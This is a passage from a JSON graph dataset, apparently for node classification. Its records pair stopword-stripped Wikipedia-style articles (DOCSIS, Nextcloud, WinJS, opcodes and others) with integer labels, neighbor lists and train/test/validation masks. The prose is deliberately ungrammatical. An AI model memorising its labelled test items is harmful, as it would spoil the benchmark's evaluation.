modified use europe modifications published name eurodocsis differences bandwidths exist european cable tv conforms pal/dvb-c standards 8 mhz rf channel bandwidth north american cable tv conforms ntsc/atsc standards specify 6 mhz per channel wider channel bandwidth eurodocsis architectures permits bandwidth allocated downstream data path toward user eurodocsis certification testing executed belgian company excentis formerly known tcomlabs docsis certification testing executed cablelabs typically customer premises equipment receives certification cmts equipment receives qualification itu telecommunication standardization sector itu-t approved various versions docsis international standards docsis 1.0 ratified itu-t recommendation j.112 annex b 1998 superseded docsis 1.1 ratified itu-t recommendation j.112 annex b 2001 subsequently docsis 2.0 ratified itu-t recommendation j.122 recently docsis 3.0 ratified itu-t recommendation j.222 j.222.0 j.222.1 j.222.2 j.222.3 note itu-t recommendation j.112 annex b corresponds docsis/eurodocsis 1.1 annex describes earlier european cable modem system dvb euromodem based atm transmission standards annex c describes variant docsis 1.1 designed operate japanese cable systems itu-t recommendation j.122 main body corresponds docsis 2.0 j.122 annex f corresponds eurodocsis 2.0 j.122 annex j describes japanese variant docsis 2.0 analogous annex c j.112 docsis provides great variety options available open systems interconnection osi layers 1 2 physical data link layers first three versions docsis standard support downstream throughput 256-qam 42.88 mbit/s per 6 mhz channel approximately 38 mbit/s overhead 55.62 mbit/s per 8 mhz channel eurodocsis approximately 50 mbit/s overhead upstream throughput possible 30.72 mbit/s per 6.4 mhz channel approximately 27 mbit/s overhead 10.24 mbit/s per 3.2 mhz channel approximately 9 mbit/s overhead docsis 3.1 supports downstream throughput 4096-qam 25 khz subcarrier spacing 1.89 gbit/s per 192 mhz ofdm channel upstream throughput possible 0.94 gbit/s per 96 mhz ofdma channel maximum raw throughput including overhead maximum payload throughput overhead tables assume 256-qam modulation downstream 64-qam upstream docsis 3.0 4096-qam modulation ofdm/ofdma first downstream/upstream methods docsis 3.1 although real-world data rates may lower due variable modulation depending snr higher data rates possible require higher order qam schemes require higher downstream modulation error ratio mer docsis 3.1 designed support 8192-qam/16,384-qam support 4096-qam mandatory meet minimum docsis 3.1 standards docsis 3.0 theoretical maximum throughput number bonded channels listed table note number channels cable system support dependent cable system set example amount available bandwidth direction width channels selected upstream direction hardware constraints limit maximum amount channels direction also note since many cases docsis capacity shared among multiple users cable companies sell maximum technical capacity available commercial product reduce congestion case heavy usage note maximum downstream bandwidth versions docsis depends version docsis used number upstream channels used docsis 3.0 used upstream channel widths independent whether docsis eurodocsis used docsis architecture includes two primary components cable modem located customer premises cable modem termination system cmts located catv headend cable systems supporting on-demand programming use hybrid fiber-coaxial system fiber optic lines bring digital signals nodes system converted rf channels modem signals coaxial trunk lines typical cmts device hosts downstream upstream ports functionality similar digital subscriber line access multiplexer dslam used digital subscriber line dsl system downstream upstream communications travel shared coax line customer premises connect single f connector cable modem typical cmts separate f connectors downstream upstream communication allows flexibility cable operator noise return upstream path upstream port usually connected single neighborhood fiber node whereas downstream port usually shared across small number neighborhoods thus generally upstream ports downstream ports cmts typical cmts four six upstream ports per downstream port cable company deploy docsis 1.1 must upgrade hybrid fiber-coaxial hfc network support return path upstream traffic without return path old docsis 1.0 standard still allows use data cable system implementing return path plain old telephone service pots hfc already two-way interactive chances high docsis 1.1 higher implemented customer pc associated peripherals termed customer-premises equipment cpe cpe connected cable modem turn connected hfc network cable modem termination system cmts cmts routes traffic hfc internet using cmts cable operator multiple service operators — mso exercises full control cable modem configuration cm configuration changed adjust varying line conditions customer service requirements docsis 2.0 also used microwave frequencies 10 ghz ireland digiweb using dedicated wireless links rather hfc network subscriber premises ordinary cm connected antenna box converts to/from microwave frequencies transmits/receives 10 ghz customer dedicated link transmitter mast must line sight sites hilltop docsis architecture also used fixed wireless equipment using 2.5–2.7 ghz multichannel multipoint distribution service mmds microwave band u.s. docsis includes media access control mac layer security services baseline privacy interface specifications docsis 1.0 used initial baseline privacy interface bpi specification bpi later improved release baseline privacy interface plus bpi+ specification used docsis 1.1 2.0 recently number enhancements baseline privacy interface added part docsis 3.0 specification renamed security sec intent bpi/sec specifications describe mac layer security services docsis cmts cable modem communications bpi/sec security goals twofold bpi/sec intended prevent cable users listening encrypting data flows cmts cable modem bpi bpi+ use 56-bit data encryption standard des encryption sec adds support 128-bit advanced encryption standard aes versions provide periodic key refreshes period configured network operator order increase level protection bpi/sec intended allow cable service operators refuse service uncertified cable modems unauthorized users bpi+ strengthened service protection adding digital certificate based authentication key exchange protocol using public key infrastructure pki based digital certificate authorities cas certification testers currently excentis formerly known tcomlabs eurodocsis cablelabs docsis typically cable service operator manually adds cable modem mac address customer account cable service operator network allows access cable modem attest mac address using valid certificate issued via pki earlier bpi specification ansi/scte 22-2 limited service protection underlying key management protocol authenticate user cable modem security docsis network vastly improved business critical communications permitted end user communication network infrastructure denied successful attacks often occur cmts configured backwards compatibility early pre-standard docsis 1.1 modems modems software upgradeable field include valid docsis eurodocsis root certificates",
    "neighbors": [
      4609,
      10242,
      517,
      3847,
      649,
      9868,
      3218,
      275,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      3629,
      11181,
      7855,
      5809,
      562,
      2996,
      9909,
      5433,
      10171,
      3133,
      3006,
      4797,
      5181,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      10831,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      1121,
      8160,
      10341,
      10344,
      11112,
      367,
      8432,
      7411,
      2932,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 362,
    "label": 7,
    "text": "Nextcloud:nextcloud nextcloud suite client-server software creating using file hosting services nextcloud application functionally similar dropbox unlike dropbox nextcloud offer off-premises file storage hosting nextcloud free open-source means anyone allowed install operate private server devices contrast proprietary services like dropbox open architecture allows adding functionality server form applications enables users full control data original owncloud developer frank karlitschek forked owncloud created nextcloud continues actively developed karlitschek members original owncloud team nextcloud files stored conventional directory structures accessible via webdav necessary user files encrypted transit optionally rest nextcloud synchronise local clients running windows windows xp vista 7 8 10 macos 10.6 later various linux distributions nextcloud permits user group administration via openid ldap content shared defining granular read/write permissions users groups alternatively nextcloud users create public urls sharing files logging file-related actions well disallowing access based file access rules also available nextcloud introducing new features monitoring capabilities full-text search kerberos authentication well audio/video conferencing expanded federation smaller user interface improvements since software modular extended plugins implement extra functionality developers offer extensions users installation via manufacturer-operated platform platform communicates nextcloud instances via open protocol app store already contains 200 extensions help extensions many functionalities added including order desktop machines synchronize files nextcloud server desktop clients available pcs running windows macos freebsd linux mobile clients exist ios android devices files data calendars contacts bookmarks also accessed managed uploaded using web browser without additional software updates file system pushed computers mobile devices connected user account nextcloud server written php javascript scripting languages remote access employs sabre/dav open-source webdav server nextcloud designed work several database management systems including sqlite mariadb mysql oracle database postgresql nextcloud 12 new architecture developed name global scale goal scaling hundreds millions users splits users separate nodes introduces components manage interaction september 2016 nextcloud cooperation western digital labs canonical company behind ubuntu released nextcloud box announcement made jane silber ceo canonical frank karlitschek nextcloud box based raspberry pi running ubuntu core snappy intended serve reference device vendors june 2017 western digital shut western digital labs caused production box end alternative hardware available vendors including others announced april 2016 karlitschek core contributors left owncloud inc included owncloud staff according sources near owncloud community fork preceded blog post karlitschek asking questions owns community owns owncloud matters short term money long term responsibility growth official statements reason fork however karlitschek mentioned fork several times talk 2018 fosdem conference emphasizing cultural mismatch open source developers business oriented people used open source community june 2 within 12 hours announcement fork american entity owncloud inc. announced shutting immediate effect stating … main lenders us cancelled credit following american law forced close doors owncloud inc. immediate effect terminate contracts 8 employees. owncloud inc. accused karlitschek poaching developers nextcloud developers arthur schiwon stated decided quit everything owncloud inc. company world evolved imagined owncloud gmbh continued operations secured financing new investors took business owncloud inc nextcloud originally fork owncloud project many differences owncloud offers open-source community edition also offer proprietary enterprise edition additional features support subscriptions — nextcloud instead uses public code base free paid users nextcloud popularity also appears overtaken owncloud least based google trends data maintenance release schedule",
    "neighbors": [
      2945,
      3462,
      2695,
      4490,
      6797,
      10254,
      4623,
      6419,
      3478,
      5755,
      1054,
      803,
      5800,
      5546,
      9901,
      2222,
      7983,
      9780,
      823,
      1849,
      11201,
      8644,
      7370,
      6098,
      8410,
      8539,
      7140,
      10340,
      8683,
      7022,
      7409,
      756,
      6651
    ],
    "mask": "None"
  },
  {
    "node_id": 363,
    "label": 9,
    "text": "ILNumerics:ilnumerics ilnumerics mathematical class library common language infrastructure cli developers domain specific language dsl implementation numerical algorithms .net platform algebra systems graphical user interfaces focus prototyping algorithms implementation algorithms distribution-ready applications done using development environments general purpose programming languages gpl ilnumerics extension visual studio aims supporting creation technical applications based .net ilnumerics started 2006 open source project originating technical university berlin 2007 ilnumerics basta innovation awards 2007 innovative .net project germany switzerland austria 6 years open source development project added closed source proprietary license 2011 aiming business academic developers time project quickly gained popularity download numbers engagement stackoverflow.com download counts website available .net framework selected managed foundation since earlier attempts java platform abandoned due technical limitations similarly .net framework designed focus requirements technical application development ilnumerics added interfaces popular codes lapack fftw complex numbers generic mult-dimensional array classes 2010 graphical capabilities added efforts increase performance technology introduced 2011 time company founded continue development technological goal establish .net framework feasible alternative unmanaged languages numeric computing ilnumerics implements base functionality frequently needed application development technical areas n-dimensional arrays complex numbers linear algebra fft plotting controls 2d 3d array classes fully compatible array features matlab numpy including internal storage order subarray creation expansion advanced indexing higher level functionality provided toolboxes interpolation optimization statistics hdf5 machine learning ilnumerics dsl embedded .net computational algorithms formulated using cli language however c visual basic officially supported due strong type system .net framework algorithms created ilnumerics strongly typed deviates syntax alternatives often weakly typed therefore easier adopt scene graph used ilnumerics realize graphical output interactive 2d 3d plots used windows forms applications hardware accelerated drawing available via opengl software renderer provided legacy hardware based gdi+ svg ilnumerics distributed extension visual studio adds tool window ide graphical inspection mathematical objects stepping user code since ilnumerics comes cli assembly targets common language infrastructure cli applications like java frameworks often criticized suitable numerical computations reasons memory management garbage collector intermediate language execution deficient optimizations compilers involved ilnumerics approaches limitations performing loop unrolling removal bound checks array accesses cache optimizations speed-up gained auto-management memory large array objects numerical operations parallelized multicore systems linear algebra routines rely processor specific optimized versions lapack blas ilnumerics arrays utilize unmanaged heap storing data way size ilnumerics arrays limited clr interoperability 3rd party libraries improved",
    "neighbors": [
      2304,
      10624,
      5380,
      7301,
      7684,
      5129,
      7945,
      3980,
      2317,
      6797,
      15,
      7950,
      8079,
      11539,
      2457,
      5148,
      7326,
      5677,
      7341,
      7983,
      9133,
      6962,
      6718,
      2242,
      5830,
      5703,
      4808,
      5833,
      5450,
      9926,
      2000,
      4572,
      2652,
      10848,
      11239,
      4840,
      5356,
      5612,
      5741,
      7148,
      2804,
      3573,
      7924
    ],
    "mask": "Test"
  },
  {
    "node_id": 364,
    "label": 2,
    "text": "WinJS:winjs windows library javascript abbreviated winjs open-source javascript library developed microsoft designed primary goal easing development windows store apps windows 8 windows 10 well windows phone apps windows phone 8.1 windows 10 mobile xbox one applications using html5 javascript alternative using xaml c vb.net c++ cx winjs started technology specific windows store apps evolved aim working web browser april 2014 microsoft build developer conference winjs released apache license free open source software intent port microsoft platforms site dedicated demonstrate library also published future development focused maintaining currently exists project plans new features feature requests meaning plans new feature release winjs provides helpers facilitate development windows store apps using html5 javascript library consists modules functions expose windows runtime way consistent javascript coding conventions winjs makes possible add windows ui controls html accompanied support data binding template engine javascript frameworks jquery work side-by-side winjs library comes additional declaration files rich developer experience using typescript strict superset javascript annotations typescript enables code completion refactoring maintaining compatibility javascript first version winjs released windows 8 winjs released open-source software apache license github popular demand project aimed cross-platform browser compatibility following distributions derived winjs 2.0 winjs 3.0 released september 2014 special focus preview winjs 4.0 announced march 27 2015 full release announced june 8",
    "neighbors": [
      803,
      9539,
      3462,
      8296,
      7629,
      10991,
      2804,
      10388,
      11221,
      3102
    ],
    "mask": "Test"
  },
  {
    "node_id": 365,
    "label": 4,
    "text": "Charles_R._Lord:charles r. lord charles richard lord april 4 1931 – february 8 1993 american intelligence official deputy director national security agency 1986 1988 time highest ranking civilian agency alumnus university michigan denison university national war college army language school joined nsa 1958 cryptologist nsa also served capacities chief europe chief staff deputy director operations recipient presidential distinguished executive award department defense national intelligence distinguished service awards 1987 assumed vice presidency e-systems major contractor nsa served position death cerebral hemorrhage 1993",
    "neighbors": [
      289,
      4898,
      7137,
      10305,
      11302,
      327,
      266,
      6668,
      9357,
      4719,
      7887,
      2897,
      1714,
      10832,
      4566,
      2712,
      6749
    ],
    "mask": "Test"
  },
  {
    "node_id": 366,
    "label": 3,
    "text": "Solaris_Multiplexed_I/O:solaris multiplexed i/o solaris multiplexed i/o mpxio known also sun storagetek traffic manager sstm earlier sun storedge traffic manager multipath i/o software solaris/illumos enables storage device accessed multiple host controller interfaces single operating system instance mpxio architecture helps protect i/o outages due i/o controller failures one i/o controller fail mpxio automatically switches alternate controller architecture also increases i/o performance load balancing across multiple i/o channels integrated within solaris operating system beginning february 2000 solaris 8 release file enable disable mpxio moved solaris 10 /kernel/drv/scsi_vhci.conf bottom file /kernel/drv/fp.conf /kernel/drv/mpt.conf",
    "neighbors": [
      5280,
      6049,
      9665,
      11363,
      5335,
      6445,
      8077,
      10237,
      11506,
      2967,
      5240,
      4858,
      381,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 367,
    "label": 5,
    "text": "Internet_layer:internet layer internet layer group internetworking methods protocols specifications internet protocol suite used transport network packets originating host across network boundaries necessary destination host specified ip address internet layer derives name function facilitating internetworking concept connecting multiple networks gateways internet layer include protocols fulfill purpose maintaining link states local nodes usually use protocols based framing packets specific link types protocols belong link layer internet-layer protocols use ip-based packets common design aspect internet layer robustness principle liberal accept conservative send misbehaving host deny internet service many users internet layer three basic functions version 4 internet protocol ipv4 transmit receive operations ip capable automatic intentional fragmentation defragmentation packets based example maximum transmission unit mtu link elements however feature dropped ipv6 communications end points hosts perform path mtu discovery assure end-to-end transmissions n't exceed maximum discovered operation internet layer responsible reliable transmission provides unreliable service best effort delivery means network makes guarantees proper arrival packets accordance end-to-end principle change previous protocols used early arpanet since packet delivery across diverse networks inherently unreliable failure-prone operation burden providing reliability placed end points communication path i.e. hosts rather network one reasons resiliency internet individual link failures proven scalability function providing reliability service duty higher level protocols transmission control protocol tcp transport layer ipv4 checksum used protect header datagram checksum ensures information received header accurate however ipv4 attempt detect errors may occurred data packet ipv6 include header checksum instead relying link layer assure data integrity entire packet including checksum primary protocols internet layer internet protocol ip implemented two versions ipv4 ipv6 internet control message protocol icmp primarily used error diagnostic functions different implementations exist ipv4 ipv6 internet group management protocol igmp used ipv4 hosts adjacent ip multicast routers establish multicast group memberships internet protocol security ipsec suite protocols securing ip communications authenticating encrypting ip packet data stream ipsec also includes protocols key exchange ipsec originally designed base specification ipv6 1995 later adapted ipv4 found widespread use securing virtual private networks internet layer tcp/ip model easily compared directly network layer layer 3 open systems interconnection osi protocol stack internet layer often improperly called network layer although overlap two models use different classification methods",
    "neighbors": [
      10242,
      1030,
      8211,
      6681,
      6682,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      8265,
      4687,
      10341,
      10344,
      3695,
      4723,
      5749,
      2679,
      4729,
      7802,
      5251,
      649,
      9868,
      3218,
      9365,
      11413,
      152,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      4797,
      702,
      7364,
      710,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      1256,
      2797,
      751,
      8432,
      8946,
      3322,
      9987,
      3847,
      10005,
      5402,
      5405,
      9511,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      871,
      11112,
      361,
      891,
      6524,
      6013,
      11647,
      1411,
      10115,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      2996,
      10171,
      3006,
      9670,
      2509,
      8669,
      8670,
      10723,
      10727,
      3564,
      4589,
      6651,
      3580,
      4095
    ],
    "mask": "Validation"
  },
  {
    "node_id": 368,
    "label": 7,
    "text": "Ninefold:ninefold ninefold cloud computing company provided infrastructure service iaas ninefold headquartered sydney australia backed macquarie telecom asx-listed australian b2b telecommunications company ninefold founded macquarie telecom 2011 meet growing demand cloud computing australia company provided virtual servers 2011 stopped trading years later ninefold offered self-managed virtual servers ninefold ’ customers able provision virtual servers via online portal 26 june 2013 ninefold became member data centre service dcaas multi-user list published australian government department finance 13 february 2015 ninefold listed product available federal government agencies macquarie telecom 10 june 2014 ninefold commenced support docker announcement docker 1.0.0 available",
    "neighbors": [
      7248,
      4194,
      2910,
      8495
    ],
    "mask": "None"
  },
  {
    "node_id": 369,
    "label": 9,
    "text": "POPLmark_challenge:poplmark challenge programming language theory poplmark challenge principles programming languages benchmark formerly mechanized metatheory masses aydemir 2005 set benchmarks designed evaluate state automated reasoning mechanization metatheory programming languages stimulate discussion collaboration among diverse cross section formal methods community loosely speaking challenge measurement well programs may proven match specification intended behave many complex issues involves challenge initially proposed members pl club university pennsylvania association collaborators around world workshop mechanized metatheory main meeting researchers participating challenge design poplmark benchmark guided features common reasoning programming languages challenge problems require formalisation large programming languages require sophistication reasoning poplmark challenge composed three parts part 1 concerns solely types system f system f subtyping problems part 2 concerns syntax semantics system f. concerns proofs part 3 concerns usability formalisation system f. particular challenge asks several solutions proposed parts poplmark challenge using following tools isabelle/hol twelf coq αprolog ats abella matita",
    "neighbors": [
      8924,
      4612,
      11141,
      8262,
      6188,
      1936,
      5585,
      5365,
      10011,
      4572
    ],
    "mask": "Validation"
  },
  {
    "node_id": 370,
    "label": 2,
    "text": "Magnussoft_ZETA:magnussoft zeta magnussoft zeta earlier yellowtab zeta operating system formerly developed yellowtab germany based operating system developed inc. yellowtab insolvency zeta later developed independent team little known distributed magnussoft february 28 2007 current version zeta 1.5 march 28 2007 magnussoft announced discontinued funding development zeta march 16 sales figures fallen far short company expectations project longer economically viable days later company also stopped distribution zeta reaction allegations zeta constituted illegal unlicensed derivative beos source code binaries zeta effort bring beos date adding support newer hardware features introduced operating systems years since incorporated ceased development 2001 among new features usb 2.0 support sata support samba support new media player enhanced localization system components unlike haiku open source efforts recreate beos functionality scratch zeta based actual beos code base closed source zeta contributed increase activity beos commercial software market number new products zeta earlier beos released however critics point list goals first release appear met including java 1.4.2 odbc support reviewers point bugs still exist beos question whether yellowtab complete access source code would need make significant updates changes made could break compilation code cases notably mozilla break actual application code optimizations applied resulting much slower builds yellowtab promoted zeta mainly german market used sold infomercials rtl shop japan still beta version prior magnussoft stopping distribution zeta mainly distributed directly magnussoft zeta yellowtab surrounded controversy critics yellowtab questioned long time legality zeta whether yellowtab legal access sources beos known yellowtab could developed zeta extent without access source code doubts remain whether yellowtab actually legal access code furthermore critics see zeta real advancement beos rather unfinished buggy operating system loaded third party applications either obsolete unsupported non-functional particularly true initial releases zeta clear conflict attention detail beos used stand disappointing beos community one point high expectations zeta yellowtab clean selection bundled applications following versions zeta remains somewhat unstable compared modern desktop operating systems perhaps criticized practice yellowtab tendency make claims turned either half truths vague enough could confirmed yellowtab announce certain developments never materialized java odbc among others would also support certain capabilities beyond zeta actually capable e.g. compatibility ms office according sources close yellowtab believed led high return rate customers bought zeta german rtl tv shopping channel reason rtl eventually stopped selling product criticism within greater beos community regarding lack personal edition zeta somewhat controversial standpoint given history beos inc throughout life intel version beos inc regularly created distributed beos demo discs cd discs somewhat crippled would mount bfs partition would install physical hard drive served test hardware support taster operating system zeta offered similar way – demo discs similar limitations made available unfortunately many beos community especially came beos post demise inc tended issue crippled demo discs controversy follows final commercial release beos revision 5 included freely distributable virtual beos installation installer created virtual beos image file host os computer could boot beos using boot disk via installation bootman native beos boot manager inc intended release taster draw users buying professional edition fully installable physical hard drive partition unfortunately many users discovered trivial task install personal version real partition inc ultimately lost much sales potential product yellowtab magnussoft learnt therefore offer version zeta could installed without purchasing license german language – zeta initial builds much packaging geared towards german-speaking audience reduced later versions first beta releases release candidates many oddities zeta would fall back german matter locale set version 1.0 zeta included badly thought activation component requires code entered authenticated via remote server nag screen stop full functionality restored nag fairly easily circumvented replacing executable called stub executable activation incredibly poorly executed often failed activation removed 1.21 release cease distribution letter posted magnussoft 5 april 2007",
    "neighbors": [
      6434,
      2179,
      708,
      3939,
      5677,
      6062,
      3631,
      3312,
      7983,
      11184,
      5363,
      7187,
      1339,
      1150,
      10079
    ],
    "mask": "Train"
  },
  {
    "node_id": 371,
    "label": 3,
    "text": "LGA_1248:lga 1248 lga 1248 intel cpu socket itanium processors 9300-series 9700-series replaces pac611 also known ppga661 used itanium 9100-series processors adds intel quickpath interconnect functionalities",
    "neighbors": [
      3588,
      5901,
      5523,
      2455,
      3992,
      8855,
      11417,
      3995,
      4252,
      6175,
      7714,
      10019,
      4523,
      2604,
      2350,
      6192,
      9649,
      4537,
      7105,
      4805,
      7110,
      8394,
      3403,
      4427,
      4179,
      3798,
      4185,
      7002,
      9945,
      11484,
      7134,
      9570,
      10468,
      613,
      8552,
      1260,
      4717,
      10225,
      9592,
      8442
    ],
    "mask": "Train"
  },
  {
    "node_id": 372,
    "label": 3,
    "text": "Opcode:opcode computing opcode abbreviated operation code also known instruction syllable instruction parcel opstring portion machine language instruction specifies operation performed beside opcode instructions also specify data process form operands addition opcodes used instruction set architectures various cpus hardware devices also used abstract computing machines part byte code specifications specifications format opcodes laid instruction set architecture isa processor question may general cpu specialized processing unit opcodes given instruction set described use opcode table detailing possible opcode bytes apart opcode instruction normally also one specifiers operands i.e data operation act although operations may implicit operands none instruction sets nearly uniform fields opcode operand specifiers well others x86 architecture instance complicated variable-length structure instruction sets extended use opcode prefixes add subset new instructions made existing opcodes following reserved byte sequences depending architecture operands may register values values stack memory values i/o ports etc. specified accessed using less complex addressing modes types operations include arithmetics data copying logical operations program control well special instructions cpuid others assembly language assembly low-level programming language uses mnemonics instructions operands represent machine code enhances readability still giving precise control machine instructions programming currently done using high-level programming languages typically easier read write languages need compiled translated assembly language run compiled programs opcodes also found so-called byte codes representations intended software interpreter rather hardware device software-based instruction sets often employ slightly higher-level data types operations hardware counterparts nevertheless constructed along similar lines examples include byte code found java class files interpreted java virtual machine jvm byte code used gnu emacs compiled lisp code .net common intermediate language cil many others",
    "neighbors": [
      518,
      6150,
      8715,
      8716,
      9739,
      2066,
      5655,
      10786,
      6181,
      10796,
      585,
      73,
      4682,
      1103,
      6739,
      3157,
      2650,
      602,
      5744,
      7281,
      5234,
      9330,
      7284,
      9331,
      8822,
      8830,
      10383,
      6818,
      6821,
      9391,
      2224,
      3767,
      9911,
      730,
      10971,
      11487,
      5862,
      11499,
      9964,
      5358,
      1776,
      2811,
      7421,
      8450,
      6924,
      9996,
      7445,
      5922,
      5412,
      10537,
      3370,
      1841,
      7997,
      9023,
      4928,
      833,
      9028,
      3402,
      5456,
      4441,
      11617,
      6502,
      7535,
      4465,
      1915,
      5501,
      7550,
      6541,
      5040,
      1462,
      8125,
      6078,
      1474,
      3010,
      9668,
      6596,
      8644,
      8136,
      8143,
      477,
      1502,
      2529,
      10224,
      499
    ],
    "mask": "Test"
  },
  {
    "node_id": 373,
    "label": 3,
    "text": "ARM_Cortex-A17:arm cortex-a17 arm cortex-a17 32-bit processor core implementing armv7-a architecture licensed arm holdings providing four cache-coherent cores serves successor cortex-a9 replaces previous arm cortex-a12 specifications arm claims cortex-a17 core provides 60 higher performance cortex-a9 core reducing power consumption 20 workload arm renamed cortex-a12 variant cortex-a17 since second revision a12 core early 2014 two indistinguishable performance features available a17 used upgrades a12 new features cortex-a17 specification found cortex-a9 specification improvements third-generation arm cortex-a also includes cortex-a7 cortex-a15 modern linux kernel implementations report support features thus",
    "neighbors": [
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      10361,
      638,
      644,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      6391,
      3835,
      2814,
      781,
      6926,
      5417,
      810,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      8058,
      392,
      398,
      1428,
      4508,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      3043,
      10734,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 374,
    "label": 1,
    "text": "VOCEDplus:vocedplus vocedplus free international research database tertiary education maintained developed staff national centre vocational education research ncver adelaide south australia focus database content relation post-compulsory education training workforce needs skills development social inclusion content vocedplus database encompasses vocational education training vet higher education lifelong learning informal learning vet schools adult community education apprenticeships/traineeships international education providers education training workforce development international scope contains 77,000 english language records many links full text documents vocedplus contains extensive australian materials includes wide range international information covering outcomes tertiary education shape published research practice policy statistics entries included following types publications reports annual reports papers discussion papers occasional papers working papers books book chapters conference papers conference proceedings journals journal articles policy documents published statistics theses podcasts teaching training materials database entry contains standard bibliographic information abstract many entries include full text access via publisher website digitised copy early years vocedplus known voced original database produced network clearinghouses across australia aim sharing activities technical education tafe sector voced produced hardcopy electronic version distributed diskette 1997 first web version voced made available national centre vocational education research ncver organisational website 1998 major project upgrade database expand international coverage commenced 2001 creation voced first website 2001 voced endorsed unesco international database technical vocational education training tvet research information many changes database website occurred period focus continuous improvement meet needs users utilise emerging technologies 2006 materials produced two adult literacy learning programs funded australian department education employment workplace relations deewr workplace english language learning well programme adult literacy national project alnp included voced 2007 australian clearinghouse network transferred hardcopy collections ncver form centralised repository resources 2009 materials produced reframing future rtf vocational education training workforce development initiative australian state territory governments included voced major rebuild database website undertaken period take advantage potential new technologies provide improved services incorporate web 2.0 technologies rss feeds share bookmark tools 2009 scope expanded fully encompass higher education sector 2011 launch vocedplus 2012 major retrospective digitisation project commenced end 2012-2013 financial year total 9,328 publications 593,534 pages/microfiche frames digitised ensuring publications available electronically free 2015 release refreshed look adopt new ncver branding plus number search enhancements guided search expert search glossary search added 2015 first series 'focus ... pages released 2016 launch 'pod network convenient efficient platform allows instant access research multitude resources range subjects 2017 completion 'pod network consisting 20 pods broad subjects including apprenticeships traineeships foundation skills teaching learning career development students 74 podlets narrow topics including online learning social media vet schools stem skills adult literacy 2018 launch 'timeline australian vet policy initiatives 1998-2017 'vet knowledge bank contains suite products capturing australia diverse complex ever-changing vet system",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 375,
    "label": 2,
    "text": "IBM_System/34,_36_System_Support_Program:ibm system/34 36 system support program system support program ssp operating system ibm system/34 system/36 minicomputers ssp command-based operating system released 1977 ssp originally contained 60 commands implemented system/34 1977 1983 different versions called releases release 1 issued original s/34 1977 release 9 issued 1981 1983 ibm repackaged ssp new computer called ibm system/36 object-code compatible s/34 1994 ibm repackaged ssp updated model s/36 called advanced/36 a/36 ibm as/400 ssp implemented virtual machine major releases ssp include limitations s/36 a/36 m/36 operating system maximum amount disk space system could utilize 4 gb per occurrence operating system machine running two m36 partitions could 4 gb another limitation program size could exceed 64kb 64mb 64kb program larger become creative later years call/parm came place would move code called program base program 63kb example could easily call 20kb called program also could around 8,000+ files machine also restrictions number files could bring program could get around putting files called programs passing result back maximum number records could initially load 8 million maximum file could hold 16 million none limitations exist s36ee maximum number files program much larger native ssp using ssp operator create delete manage s/34-36 objects libraries data files menus procedures source members security files ssp contains modules dfu seu sda wsu permit operators build libraries files enter information files produce simple reports maintain menu structure simplifies access information advanced/36 support wsu password resource security also implemented ssp remote communications today similar dial-up networking ssp disk-based operating system computer programs run fixed disk diskette tape complement system/34 5340 system/36 5360/5362 fixed disk array one four fixed disks least one computer terminal 8 diskette drive optionally fitted two magazine units contain 10 diskettes three diskette slots.. s/36 5363/5364 5-1/4 diskette drive s/36 computers configured 8809 reel-to-reel tape drive 800/1600 bpi 6157 1/4 cartridge qic tape drive a/36 computers high-density qic drive 5.25 8 diskette drive single optional 9348-001 9 track reel reel 1600/6250 bpi tape drive basic ssp procedures include basic ssp commands include functions created system/36 csall created vasp ** functions discontinued system/36 *** system/34 created single job queue system/36 created five job queues therefore job queue written action refer single job queue **** function added advanced/36 ssp procedures utilize utility programs cases useful computer programmer ssp procedures maint library utility used aloclibr bldlibr fromlibr librlibr remove condense listlibr tolibr copy file utility used save restore copydata listdata many utilities including fbld label duprd init delet hist cnfig gsort pack prof flexible program level associated ssp procedures high-level language programs require ocl activated ocl used load programs system memory start process called execution assign resources disk files printers message members memory disk space programs abilities displaying text screen pause messages forth make ocl powerful system/3 1969 ran disk-based batch operating system called scp 5702-sc1 ibm introduced s/3 online program called ccp communications control program started batch program ibm system/32 1975 ran disk-based operating system called scp system control program ibm system/38 1978 ran operating system called cpf control program facility much advanced ssp particularly similar",
    "neighbors": [
      10883,
      4996,
      6148,
      7053,
      9619,
      11673,
      6557,
      3359,
      10273,
      6442,
      7983,
      9139,
      6325,
      573,
      1219,
      964,
      6342,
      11596,
      863,
      3938,
      5603,
      868,
      3429,
      5220,
      9829,
      2168,
      3323,
      2172,
      2813
    ],
    "mask": "Test"
  },
  {
    "node_id": 376,
    "label": 6,
    "text": "Kernfs_(BSD):kernfs bsd berkeley software distribution bsd descendants kernfs pseudo file system provides access information currently running kernel file system content dynamically generated operating system booted kernfs often mounted directory result nature kernfs consist actual files storage device allowing instead processes retrieve system information accessing virtual files kernfs first appeared 4.4bsd netbsd 6.0 continues use kernfs default mounting canonical mount point",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      6675,
      7187,
      6677,
      5142,
      8214,
      9236,
      25,
      10776,
      3611,
      4637,
      9249,
      9762,
      5158,
      7217,
      9784,
      7225,
      10809,
      11323,
